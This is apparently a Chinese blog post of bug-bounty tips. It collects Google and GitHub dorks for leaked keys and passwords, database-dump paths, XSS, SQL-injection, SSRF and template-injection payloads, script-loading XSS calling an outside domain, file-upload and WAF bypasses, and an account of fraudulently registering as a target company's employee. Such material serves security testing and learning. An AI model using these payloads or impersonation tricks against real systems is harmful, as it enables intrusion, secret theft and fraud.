当前位置: 首页 > 工具软件 > 猎人放置 > 使用案例 >

赏金猎人技巧

武卓
2023-12-01

①可能隐藏的注册页面

/register	                    Laravel
/user/register	                Drupal
/wp-login.php?action=register	WordPress
/register	                    eZ Publish

②google常见的可能挖掘的页面

inurl:example.com intitle:"index of"
inurl:example.com intitle:"index of /" "*key.pem"
inurl:example.com ext:log
inurl:example.com intitle:"index of" ext:sql|xls|xml|json|csv
inurl:example.com "MYSQL_ROOT_PASSWORD:" ext:env OR ext:yml -git

③Drupal可能的隐藏页面

https://target.com/node/1

④挖数据库备份

/back.sql
/backup.sql
/accounts.sql
/backups.sql
/clients.sql
/customers.sql
/data.sql
/database.sql
/database.sqlite
/users.sql
/db.sql
/db.sqlite
/db_backup.sql
/dbase.sql
/dbdump.sql
setup.sql
sqldump.sql
/dump.sql
/mysql.sql
/sql.sql
/temp.sql

⑤邮箱payload组合拳
1.xss

test+(<script>alert(0)</script>)@example.com
test@example(<script>alert(0)</script>).com
"<script>alert(0)</script>"@example.com

2.sql注入

"' OR 1=1 -- '"@example.com
"mail'); DROP TABLE users;--"@example.com

3.ssrf伪造

john.doe@abc123.burpcollaborator.net
john.doe@[127.0.0.1]

4.模板注入

"<%= 7 * 7 %>"@example.com
test+(${{7*7}})@example.com

⑥机构获取身份证方法

导致原因:
注册为员工会导致要求获得“仅限员工私下发售”,并最终获得“身份证”。

方法:
Google上搜索Target的员工优惠:inurl:“目标名称”员工提供
找到了向目标公司提供报价的网站。
发现报价仅限于员工。
尝试在“ 员工ID ”字段中使用随机数进行注册
由于未验证 “ 员工ID ” ,因此成功注册为员工。
注册为员工会导致要求私人报价。
该网站还提供了“ 身份证 ”,可用于证明我们是目标公司的合法雇员。

⑦nice的xss

<!-- If number of iframes on the page is constant -->
<iframe/onload=src=top[0].name+/\NJ.₨?/>

<!-- If number of iframes on the page is random -->
<iframe/onload=src=contentWindow.name+/\NJ.₨?/>

<!-- If unsafe-inline is disabled in CSP and external scripts allowed -->
<iframe/srcdoc="<script/src=//NJ.₨></script>">

<!-- Just a casual script -->
<script/src=//NJ.₨></script>

<!-- If you control the name of the window -->
<iframe/onload=src=top.name>

<!-- If you control the name, will work on Firefox in any context, will fail in chromium in DOM -->
<svg/onload=eval(name)>

<!-- If you control the URL -->
<svg/onload=eval(`'`+URL)>

利用xss+文件上传
如果找到图像的文件上传功能,请尝试引入文件名中带有XSS(跨站点脚本)有效负载的图像,如下

<img src=x onerror=alert('XSS')>.png
"><img src=x οnerrοr=alert('XSS')>.png
"><svg onmouseover=alert(1)>.svg
<<script>alert('xss')<!--a-->a.png

⑧快速找web结构方法
即获得了目录机构状况时

wget -r --no-parent target.com/dir

⑨找文件上传典型可能出现问题的扩展名
ASP:

.aspx
.config
.ashx
.asmx
.aspq
.axd
.cshtm
.cshtml
.rem
.soap
.vbhtm
.vbhtml
.asa
.asp
.cer
.shtml

PHP:

.php
.php5
.php3
.php2
.shtml
.html
.php.png
(双扩展名攻击)

特殊绕过

file.jpg%00shell.php
shell.php%00file.jpg
shell.php%00.jpg

⑩绕重定向类

#如最开始
https://target.com/admin/ –> HTTP 302(重定向到登录页面)
https://target.com/admin..;/ –> HTTP 200 OK
#绕方法
https://target.com/../admin
https://target.com/whatever/..;/admin

十一.
绕waf类–>代理方法

X-Originating-IP:IP
X-Forward-For:IP
X-Remote-IP:IP
X-Remote-Addr:IP
X-Client-IP:IP
X-Host:IP
X-Forwared-Host:IP

绕waf的IP范围

192.168.0.0/16
172.16.0.0/12
127.0.0.0/8
10.0.0.0/8

十二,json中可能存在敏感信息泄露
如不带json时访问得到的

请求:响应:
GET /ResetPassword HTTP/1.1
{"email":"victim@example.com"}
HTTP/1.1 200 OK

带json–>获取了token

GET /ResetPassword.json HTTP/1.1
{"email":"victim@example.com"}
HTTP/1.1 200 OK
{"success":"true","token":"596a96-cc7bf-9108c-d896f-33c44a-edc8a"}

十三,特权操作
如最初
请求:
GET /delete?user=test HTTP/1.1

响应:
HTTP/1.1 401 Unauthorized
现在让我们尝试一下:
添加后
请求:响应:
GET /delete?user=test HTTP/1.1
X-Custom-IP-Authorization: 127.0.0.1

HTTP/1.1 302 Found
这在前端使用添加的自定义HTTP标头(X-Custom-IP-Authorization)的情况下可能有效-例如,当它用于标识通过负载均衡器连接到Web服务器的客户端的原始IP地址时。
通过将自己标识为127.0.0.1,我们可以规避Web应用程序的访问控制并执行特权操作。
十四,github找网站密码方法

“target.com” send_keys
“target.com” password
“target.com” api_key
“target.com” apikey
“target.com” jira_password
“target.com” root_password
“target.com” access_token
“target.com” config
“target.com” client_secret
“target.com” user auth

十五
成为赏金猎人的方法

睡得好
了解漏洞类型(owasp)
每次专注于1个
阅读与练习
了解如何寻找和利用
了解如何分析网站
查看其他人的行为(报告)
学习一种编程语言
制作自己的脚本
不要着急

 类似资料: